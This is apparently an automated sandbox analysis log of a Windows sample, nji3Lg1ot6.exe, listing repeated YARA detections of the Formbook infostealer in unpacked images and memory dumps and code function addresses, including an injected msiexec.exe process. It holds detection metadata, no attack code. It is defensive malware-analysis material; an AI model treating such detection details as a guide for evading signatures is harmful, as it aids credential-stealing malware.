          Source: 1.2.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.nji3Lg1ot6.exe.23e0000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.nji3Lg1ot6.exe.23e0000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.nji3Lg1ot6.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.nji3Lg1ot6.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.nji3Lg1ot6.exe.23e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.nji3Lg1ot6.exe.23e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.nji3Lg1ot6.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.nji3Lg1ot6.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.nji3Lg1ot6.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.nji3Lg1ot6.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: nji3Lg1ot6.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 1.0.nji3Lg1ot6.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nji3Lg1ot6.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.nji3Lg1ot6.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nji3Lg1ot6.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.nji3Lg1ot6.exe.23e0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.nji3Lg1ot6.exe.23e0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.nji3Lg1ot6.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nji3Lg1ot6.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.nji3Lg1ot6.exe.23e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.nji3Lg1ot6.exe.23e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.nji3Lg1ot6.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nji3Lg1ot6.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.nji3Lg1ot6.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nji3Lg1ot6.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_0040604C
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_00404772
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00401026
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041E261
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041EB71
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041E3DA
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041E4B4
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00409E4B
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00409E50
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041EEB5
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041D7DE
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041E79A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A520A0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF20A8
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A3B090
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF28EC
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AFE824
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4A830
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE1002
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A499BF
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A44120
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2F900
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF22AE
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00ADFA2B
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5EBB0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE03DA
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AEDBD2
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF2B28
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4AB40
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A3841F
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AED466
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A52581
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A3D5E0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF25DD
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A20D20
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF2D07
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF1D55
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF2EF7
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A46E30
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AED616
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF1FF1
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AFDFCE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0476D466
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B841F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04771D55
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046A0D20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04772D07
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046BD5E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047725DD
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D2581
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046C6E30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0476D616
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04772EF7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04771FF1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0477DFCE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0477E824
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CA830
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04761002
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047728EC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D20A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047720A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046BB090
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046C4120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046AF900
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046C99BF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0475FA2B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047722AE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CAB40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04772B28
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0476DBD2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047603DA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046DEBB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DEB71
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006C2D90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006C9E4B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006C9E50
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DEEB5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DD7DE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006C2FB0
